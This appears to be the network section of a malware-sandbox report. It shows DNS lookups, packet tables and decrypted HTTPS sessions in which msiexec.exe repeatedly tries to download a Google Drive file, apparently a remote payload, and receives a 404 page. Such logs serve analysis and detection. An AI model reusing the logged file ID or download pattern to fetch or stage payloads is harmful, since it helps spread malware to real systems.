Jan 11, 2025 03:09:24.046314001 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.046407938 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.046679020 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.046694994 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.695859909 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.696010113 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.696943998 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.697063923 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.698720932 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.698735952 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.699069023 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:24.699131966 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.699460030 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:24.743341923 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:25.075876951 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:25.075973988 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:25.075994015 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:25.076071978 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:25.076108932 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:25.076183081 CET	443	50016	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:25.076247931 CET	50016	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:25.101813078 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.101872921 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:25.101952076 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.102227926 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.102245092 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:25.736895084 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:25.736984015 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.737605095 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.737617016 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:25.737930059 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:25.737936020 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.148937941 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.149004936 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.149038076 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.149068117 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.149085045 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.149085045 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.149141073 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.149909019 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.149925947 CET	443	50017	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:26.149935961 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.149975061 CET	50017	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:26.281408072 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:26.281461000 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:26.281553030 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:26.281830072 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:26.281841993 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.062772989 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.062902927 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.063561916 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.063626051 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.065323114 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.065330029 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.065560102 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.065614939 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.065910101 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.107322931 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.451652050 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.451714039 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.451733112 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.451778889 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.452269077 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.452299118 CET	443	50018	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:27.452347994 CET	50018	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:27.475765944 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:27.475816011 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:27.475934982 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:27.476214886 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:27.476227045 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.113142967 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.113296032 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.113935947 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.113964081 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.114156008 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.114168882 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.517137051 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.517213106 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.517266989 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.517286062 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.517292976 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.517333031 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.518160105 CET	50019	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:28.518176079 CET	443	50019	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:28.655531883 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:28.655590057 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:28.655678988 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:28.655935049 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:28.655956030 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.284539938 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.284643888 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.286851883 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.286948919 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.289201975 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.289218903 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.289470911 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.289525986 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.289943933 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.335330009 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.677665949 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.677918911 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.678062916 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.678112030 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.678303957 CET	443	50020	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:29.678319931 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.678375006 CET	50020	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:29.698513031 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:29.698544025 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:29.698616982 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:29.698868990 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:29.698879004 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.336098909 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.336159945 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.336571932 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.336575985 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.336749077 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.336754084 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.748424053 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.748502016 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.748568058 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.748579025 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.748594999 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.748615980 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.749330997 CET	50021	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:30.749345064 CET	443	50021	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:30.874169111 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:30.874208927 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:30.874288082 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:30.874548912 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:30.874569893 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.527868032 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.527937889 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.528647900 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.528693914 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.530946970 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.530956984 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.531219006 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.531276941 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.531673908 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.579322100 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.835922956 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.836034060 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.836057901 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.836102962 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.836177111 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.836208105 CET	443	50022	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:31.836256027 CET	50022	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:31.914288998 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:31.914315939 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:31.914381027 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:31.914617062 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:31.914624929 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:32.552367926 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:32.552469969 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:32.808753967 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:32.808774948 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:32.809144974 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:32.809149981 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148587942 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148637056 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148675919 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.148688078 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148719072 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.148726940 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.148730993 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148763895 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.148766041 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.148798943 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.242393017 CET	50023	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:33.242413998 CET	443	50023	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:33.452644110 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:33.452687025 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:33.452769041 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:33.453017950 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:33.453032017 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.089463949 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.089591980 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.090219975 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.090296030 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.092251062 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.092261076 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.092490911 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.092549086 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.092830896 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.139327049 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.497229099 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.497308969 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.497334957 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.497421980 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.497560978 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.497594118 CET	443	50024	216.58.206.78	192.168.2.6
Jan 11, 2025 03:09:34.497646093 CET	50024	443	192.168.2.6	216.58.206.78
Jan 11, 2025 03:09:34.512423992 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:34.512470961 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:34.512533903 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:34.512898922 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:34.512912989 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.155739069 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.155833006 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.156272888 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.156282902 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.156429052 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.156435013 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.567260981 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.567346096 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.567401886 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.567408085 CET	443	50025	142.250.181.225	192.168.2.6
Jan 11, 2025 03:09:35.567435026 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.567457914 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.568252087 CET	50025	443	192.168.2.6	142.250.181.225
Jan 11, 2025 03:09:35.568272114 CET	443	50025	142.250.181.225	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:08:49.125577927 CET	50711	53	192.168.2.6	1.1.1.1
Jan 11, 2025 03:08:49.135037899 CET	53	50711	1.1.1.1	192.168.2.6
Jan 11, 2025 03:08:50.431694984 CET	62049	53	192.168.2.6	1.1.1.1
Jan 11, 2025 03:08:50.438808918 CET	53	62049	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 03:08:49.125577927 CET	192.168.2.6	1.1.1.1	0x83f3	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:08:50.431694984 CET	192.168.2.6	1.1.1.1	0xe5d9	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 03:08:49.135037899 CET	1.1.1.1	192.168.2.6	0x83f3	No error (0)	drive.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:08:50.438808918 CET	1.1.1.1	192.168.2.6	0xe5d9	No error (0)	drive.usercontent.google.com		142.250.181.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49985	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:50 UTC	216	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-11 02:08:50 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:50 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-uOr9cAEYV67Xko2_xi9Iag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49986	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:51 UTC	258	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-11 02:08:51 UTC	2218	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTYurtJE-J8abv72OPbQC7EpGzekbbDHoqZf86aKBNOVd6j5mPUos2w7Z4qhWNGZBLV Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:51 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-H2F3BWaFKNraajirQZouaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU; expires=Sun, 13-Jul-2025 02:08:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:08:51 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 62 53 39 49 68 62 4c 32 67 6f 6f 56 58 5a 4f 33 76 46 37 68 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zbS9IhbL2gooVXZO3vF7hQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49987	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:08:52 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:08:52 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:08:52 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-QqxIjWH9XMymgy_B2xuPUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 